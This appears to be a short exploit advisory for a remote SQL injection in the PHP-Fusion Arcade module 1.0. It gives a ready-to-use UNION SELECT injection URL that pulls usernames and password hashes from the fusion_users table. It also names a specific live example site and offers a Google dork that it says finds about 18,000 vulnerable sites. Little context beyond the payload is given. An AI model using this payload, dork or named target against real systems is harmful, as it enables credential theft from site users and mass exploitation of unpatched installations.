PHP-Fusion module Arcade version 1.0 suffers from a remote SQL injection vulnerability.
09c2a92d7326bbade70922ec3e5ad35f2f0e4c1fa770836afb0dadfce655546f
PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln
--------------------------------
Bulan: xoron
xoron.biz
--------------------------------
Exploit:
index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*
--------------------------------
Exapmle: http://www.basicwallpapers.dk/infusions/arcade/
--------------------------------
Google Dork:
/infusions/arcade/ 18.000 sites:)
--------------------------------
Ekin0x / --> evilc0der.org <--
--------------------------------